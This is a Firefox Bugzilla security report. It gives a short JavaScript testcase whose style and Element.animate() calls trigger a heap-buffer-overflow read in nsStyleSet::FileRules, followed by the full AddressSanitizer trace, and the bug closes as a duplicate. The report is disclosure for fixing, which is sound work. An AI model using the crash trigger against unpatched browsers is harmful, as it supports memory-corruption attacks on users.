Closed Bug 1333544 Opened 7 years ago Closed 7 years ago

heap-buffer-overflow in nsStyleSet::FileRules

Categories

(Core :: DOM: Animation, defect)

Product:
Core
Component:
DOM: Animation
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED DUPLICATE of bug 1331704
Tracking Flags:
Tracking Status
firefox54 --- affected

People

(Reporter: nils, Unassigned)

Details

(Keywords: crash, sec-high, testcase) 

The following testcase crashes the latest ASAN build of Firefox (BuildID=20170124025447):

<script>
function start() {
        o10=document.createElement('style');
        document.documentElement.appendChild(o10);
        o18=document.createTextNode("*{ bottom: auto!important");
        o10.appendChild(o18);
        o85=document.createElement('head');
        document.documentElement.appendChild(o85);
        o86=document.createElement('style');
        o85.appendChild(o86);
        o92=document.createElement('link');
        o85.animate([{MozFloatEdge: 'content-box'},{objectFit: 'contain',MozFloatEdge: 'content-box',listStylePosition: 'outside'}],3);
        o86.appendChild(o92);
        o92.animate([{all: 'initial',listStyleImage: 'none'}],4);
        o92.animate([{}],4);
}
</script>
<body onload="start()"></body>


=================================================================
==8638==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60700013d0e8 at pc 0x7f9e7e741f6a bp 0x7ffc561069f0 sp 0x7ffc561069e8
READ of size 8 at 0x60700013d0e8 thread T0 (Web Content)
    #0 0x7f9e7e741f69 in get /home/worker/workspace/build/src/obj-firefox/dist/include/nsAutoPtr.h:171:12
    #1 0x7f9e7e741f69 in operator nsCSSCompressedDataBlock * /home/worker/workspace/build/src/obj-firefox/dist/include/nsAutoPtr.h:185
    #2 0x7f9e7e741f69 in HasImportantData /home/worker/workspace/build/src/layout/style/Declaration.h:137
    #3 0x7f9e7e741f69 in GetImportantStyleData /home/worker/workspace/build/src/layout/style/Declaration.h:304
    #4 0x7f9e7e741f69 in nsStyleSet::AddImportantRules(nsRuleNode*, nsRuleNode*, nsRuleWalker*) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:1043
    #5 0x7f9e7e742e11 in nsStyleSet::FileRules(bool (*)(nsIStyleRuleProcessor*, void*), RuleProcessorData*, mozilla::dom::Element*, nsRuleWalker*) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:1221:5
    #6 0x7f9e7e7454b1 in nsStyleSet::ResolveStyleForInternal(mozilla::dom::Element*, nsStyleContext*, TreeMatchContext&, nsStyleSet::AnimationFlag) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:1367:3
    #7 0x7f9e7e744dec in ResolveStyleFor /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:1403:10
    #8 0x7f9e7e744dec in nsStyleSet::ResolveStyleFor(mozilla::dom::Element*, nsStyleContext*) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:1350
    #9 0x7f9e7e57573c in ResolveStyleFor /home/worker/workspace/build/src/layout/style/nsStyleSet.h:121:12
    #10 0x7f9e7e57573c in ResolveStyleFor /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/StyleSetHandleInlines.h:85
    #11 0x7f9e7e57573c in ResolveWithAnimation /home/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:499
    #12 0x7f9e7e57573c in nsComputedDOMStyle::DoGetStyleContextForElementNoFlush(mozilla::dom::Element*, nsIAtom*, nsIPresShell*, nsComputedDOMStyle::StyleType, nsComputedDOMStyle::AnimationFlag) /home/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:656
    #13 0x7f9e7e574f25 in GetStyleContextForElementNoFlush /home/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:677:10
    #14 0x7f9e7e574f25 in nsComputedDOMStyle::GetStyleContextForElement(mozilla::dom::Element*, nsIAtom*, nsIPresShell*, nsComputedDOMStyle::StyleType) /home/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:447
    #15 0x7f9e7a49b1ac in already_AddRefed<nsStyleContext> mozilla::dom::KeyframeEffectReadOnly::DoGetTargetStyleContext<(mozilla::dom::KeyframeEffectReadOnly::AnimationStyle)1>() /home/worker/workspace/build/src/dom/animation/KeyframeEffectReadOnly.cpp:925:12
    #16 0x7f9e7a497be3 in GetTargetStyleContext /home/worker/workspace/build/src/dom/animation/KeyframeEffectReadOnly.cpp:937:10
    #17 0x7f9e7a497be3 in mozilla::dom::KeyframeEffectReadOnly::SetKeyframes(JSContext*, JS::Handle<JSObject*>, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/animation/KeyframeEffectReadOnly.cpp:184
    #18 0x7f9e7a4917c8 in already_AddRefed<mozilla::dom::KeyframeEffect> mozilla::dom::KeyframeEffectReadOnly::ConstructKeyframeEffect<mozilla::dom::KeyframeEffect, mozilla::dom::UnrestrictedDoubleOrKeyframeAnimationOptions>(mozilla::dom::GlobalObject const&, mozilla::dom::Nullable<mozilla::dom::ElementOrCSSPseudoElement> const&, JS::Handle<JSObject*>, mozilla::dom::UnrestrictedDoubleOrKeyframeAnimationOptions const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/animation/KeyframeEffectReadOnly.cpp:767:3
    #19 0x7f9e7a490d9d in mozilla::dom::KeyframeEffect::Constructor(mozilla::dom::GlobalObject const&, mozilla::dom::Nullable<mozilla::dom::ElementOrCSSPseudoElement> const&, JS::Handle<JSObject*>, mozilla::dom::UnrestrictedDoubleOrKeyframeAnimationOptions const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/animation/KeyframeEffect.cpp:65:10
    #20 0x7f9e7a6ee37d in mozilla::dom::Element::Animate(mozilla::dom::Nullable<mozilla::dom::ElementOrCSSPseudoElement> const&, JSContext*, JS::Handle<JSObject*>, mozilla::dom::UnrestrictedDoubleOrKeyframeAnimationOptions const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/Element.cpp:3421:5
    #21 0x7f9e7a6edceb in mozilla::dom::Element::Animate(JSContext*, JS::Handle<JSObject*>, mozilla::dom::UnrestrictedDoubleOrKeyframeAnimationOptions const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/Element.cpp:3378:10
    #22 0x7f9e7be660b4 in mozilla::dom::ElementBinding::animate(JSContext*, JS::Handle<JSObject*>, mozilla::dom::Element*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/ElementBinding.cpp:3327:55
    #23 0x7f9e7c3230a0 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2914:13
    #24 0x7f9e81d6477c in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #25 0x7f9e81d6477c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:460
    #26 0x7f9e81d4a50e in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:511:12
    #27 0x7f9e81d4a50e in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2956
    #28 0x7f9e81d2e401 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:406:12
    #29 0x7f9e81d649fc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:478:15
    #30 0x7f9e81d650b2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:524:10
    #31 0x7f9e825bf4ed in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2847:12
    #32 0x7f9e7be80f1f in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:259:37
    #33 0x7f9e7c7a5451 in Call<nsISupports *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:361:12
    #34 0x7f9e7c7a5451 in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:213
    #35 0x7f9e7c76f61d in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1136:16
    #36 0x7f9e7c77119c in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1318:20
    #37 0x7f9e7c75bf63 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:462:5
    #38 0x7f9e7c75f854 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:819:9
    #39 0x7f9e7e91b0c9 in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1024:7
    #40 0x7f9e7f7c541e in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7603:5
    #41 0x7f9e7f7c1354 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7407:7
    #42 0x7f9e7f7c88ff in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7304:13
    #43 0x7f9e798f0380 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1255:3
    #44 0x7f9e798ef318 in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:840:5
    #45 0x7f9e798ec081 in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:730:9
    #46 0x7f9e798ee174 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:612:5
    #47 0x7f9e798eed2c in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:468:14
    #48 0x7f9e780d354b in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:633:18
    #49 0x7f9e7a9074ab in nsDocument::DoUnblockOnload() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8694:7
    #50 0x7f9e7a9b132f in nsUnblockOnloadEvent::Run() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8645:5
    #51 0x7f9e77eecb3b in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1240:7
    #52 0x7f9e77f701bc in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/glue/nsThreadUtils.cpp:390:10
    #53 0x7f9e78d28f5f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #54 0x7f9e78c9b828 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
    #55 0x7f9e78c9b828 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #56 0x7f9e78c9b828 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #57 0x7f9e7e0e53bf in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
    #58 0x7f9e802dc217 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:927:12
    #59 0x7f9e78c9b828 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
    #60 0x7f9e78c9b828 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #61 0x7f9e78c9b828 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #62 0x7f9e802dba3d in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:759:7
    #63 0x4df9d3 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:115:19
    #64 0x4df9d3 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:284
    #65 0x7f9e9330c82f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291
    #66 0x41baf8 in _start (/home/nils/fuzzer3/firefox/firefox+0x41baf8)

0x60700013d0e8 is located 8 bytes to the left of 80-byte region [0x60700013d0f0,0x60700013d140)
allocated by thread T0 (Web Content) here:
    #0 0x4b256b in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x4e0a4d in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7f9e7a4bd140 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7f9e7a4bd140 in mozilla::MakePropertyValuePair(nsCSSPropertyID, nsAString_internal const&, nsCSSParser&, nsIDocument*) /home/worker/workspace/build/src/dom/animation/KeyframeUtils.cpp:1061
    #4 0x7f9e7a4ac178 in ConvertKeyframeSequence /home/worker/workspace/build/src/dom/animation/KeyframeUtils.cpp:861:9
    #5 0x7f9e7a4ac178 in GetKeyframeListFromKeyframeSequence /home/worker/workspace/build/src/dom/animation/KeyframeUtils.cpp:769
    #6 0x7f9e7a4ac178 in mozilla::KeyframeUtils::GetKeyframesFromObject(JSContext*, nsIDocument*, JS::Handle<JSObject*>, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/animation/KeyframeUtils.cpp:460
    #7 0x7f9e7a497baf in mozilla::dom::KeyframeEffectReadOnly::SetKeyframes(JSContext*, JS::Handle<JSObject*>, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/animation/KeyframeEffectReadOnly.cpp:179:5
    #8 0x7f9e7a4917c8 in already_AddRefed<mozilla::dom::KeyframeEffect> mozilla::dom::KeyframeEffectReadOnly::ConstructKeyframeEffect<mozilla::dom::KeyframeEffect, mozilla::dom::UnrestrictedDoubleOrKeyframeAnimationOptions>(mozilla::dom::GlobalObject const&, mozilla::dom::Nullable<mozilla::dom::ElementOrCSSPseudoElement> const&, JS::Handle<JSObject*>, mozilla::dom::UnrestrictedDoubleOrKeyframeAnimationOptions const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/animation/KeyframeEffectReadOnly.cpp:767:3
    #9 0x7f9e7a490d9d in mozilla::dom::KeyframeEffect::Constructor(mozilla::dom::GlobalObject const&, mozilla::dom::Nullable<mozilla::dom::ElementOrCSSPseudoElement> const&, JS::Handle<JSObject*>, mozilla::dom::UnrestrictedDoubleOrKeyframeAnimationOptions const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/animation/KeyframeEffect.cpp:65:10
    #10 0x7f9e7a6ee37d in mozilla::dom::Element::Animate(mozilla::dom::Nullable<mozilla::dom::ElementOrCSSPseudoElement> const&, JSContext*, JS::Handle<JSObject*>, mozilla::dom::UnrestrictedDoubleOrKeyframeAnimationOptions const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/Element.cpp:3421:5
    #11 0x7f9e7a6edceb in mozilla::dom::Element::Animate(JSContext*, JS::Handle<JSObject*>, mozilla::dom::UnrestrictedDoubleOrKeyframeAnimationOptions const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/Element.cpp:3378:10
    #12 0x7f9e7be660b4 in mozilla::dom::ElementBinding::animate(JSContext*, JS::Handle<JSObject*>, mozilla::dom::Element*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/ElementBinding.cpp:3327:55
    #13 0x7f9e7c3230a0 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2914:13
    #14 0x7f9e81d6477c in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #15 0x7f9e81d6477c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:460
    #16 0x7f9e81d4a50e in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:511:12
    #17 0x7f9e81d4a50e in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2956
    #18 0x7f9e81d2e401 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:406:12
    #19 0x7f9e81d649fc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:478:15
    #20 0x7f9e81d650b2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:524:10
    #21 0x7f9e825bf4ed in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2847:12
    #22 0x7f9e7be80f1f in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:259:37
    #23 0x7f9e7c7a5451 in Call<nsISupports *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:361:12
    #24 0x7f9e7c7a5451 in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:213
    #25 0x7f9e7c76f61d in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1136:16
    #26 0x7f9e7c77119c in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1318:20
    #27 0x7f9e7c75bf63 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:462:5
    #28 0x7f9e7c75f854 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:819:9
    #29 0x7f9e7e91b0c9 in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1024:7
    #30 0x7f9e7f7c541e in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7603:5
    #31 0x7f9e7f7c1354 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7407:7
    #32 0x7f9e7f7c88ff in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7304:13
    #33 0x7f9e798f0380 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1255:3
    #34 0x7f9e798ef318 in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:840:5
    #35 0x7f9e798ec081 in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:730:9

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/worker/workspace/build/src/obj-firefox/dist/include/nsAutoPtr.h:171:12 in get
Shadow bytes around the buggy address:
  0x0c0e8001f9c0: fa fa fa fa fa fa fa fa fa fa 00 00 00 00 00 00
  0x0c0e8001f9d0: 00 00 00 00 fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c0e8001f9e0: 00 00 fa fa fa fa 00 00 00 00 00 00 00 00 00 fa
  0x0c0e8001f9f0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 fa fa
  0x0c0e8001fa00: fa fa 00 00 00 00 00 00 00 00 00 fa fa fa fa fa
=>0x0c0e8001fa10: 00 00 00 00 00 00 00 00 00 fa fa fa fa[fa]00 00
  0x0c0e8001fa20: 00 00 00 00 00 00 00 00 fa fa fa fa 00 00 00 00
  0x0c0e8001fa30: 00 00 00 00 00 00 fa fa fa fa fd fd fd fd fd fd
  0x0c0e8001fa40: fd fd fd fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c0e8001fa50: fd fa fa fa fa fa 00 00 00 00 00 00 00 00 00 00
  0x0c0e8001fa60: fa fa fa fa fd fd fd fd fd fd fd fd fd fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==8638==ABORTING
Group: core-security → dom-core-security
Keywords: crash, sec-high, testcase
This is essentially same problem of bug 1331704.
Status: NEW → RESOLVED
Closed: 7 years ago
Resolution: --- → DUPLICATE
Group: dom-core-security
You need to log in before you can comment on or make changes to this bug.